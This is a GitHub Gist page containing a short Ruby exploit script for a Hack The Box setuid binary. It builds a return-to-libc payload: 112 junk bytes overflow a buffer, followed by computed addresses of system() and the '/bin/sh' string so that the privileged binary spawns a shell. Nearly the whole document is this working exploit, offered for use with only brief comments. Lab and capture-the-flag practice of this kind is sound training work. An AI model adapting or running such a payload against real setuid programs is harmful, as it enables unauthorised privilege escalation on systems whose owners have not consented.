Last active
November 8, 2018 07:42
-
-
Save safiire/89273b78b779a99191726fddb5e844fb to your computer and use it in GitHub Desktop.
Return2LibC for a HTB setuid binary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # This is what we need to guess from ldd vuln | |
| ldd_load_address = 0xb75ba000 | |
| # Next get offset of system() and its address | |
| system_offset = 0x1e310 | |
| system_address = ldd_load_address + system_offset | |
| # Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction | |
| correction = 0x22000 | |
| strings_bin_sh_offset = 0x162bac | |
| bin_sh_address = ldd_load_address + strings_bin_sh_offset - correction | |
| # Buffer junk length from debrujin pattern | |
| junk = "\xcc" * 112 | |
| payload = "" | |
| payload += junk | |
| payload += [system_address].pack('L') | |
| payload += [bin_sh_address].pack('L') # This goes from pop ebp or something | |
| payload += [bin_sh_address].pack('L') # This is the address that gets used | |
| print payload |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment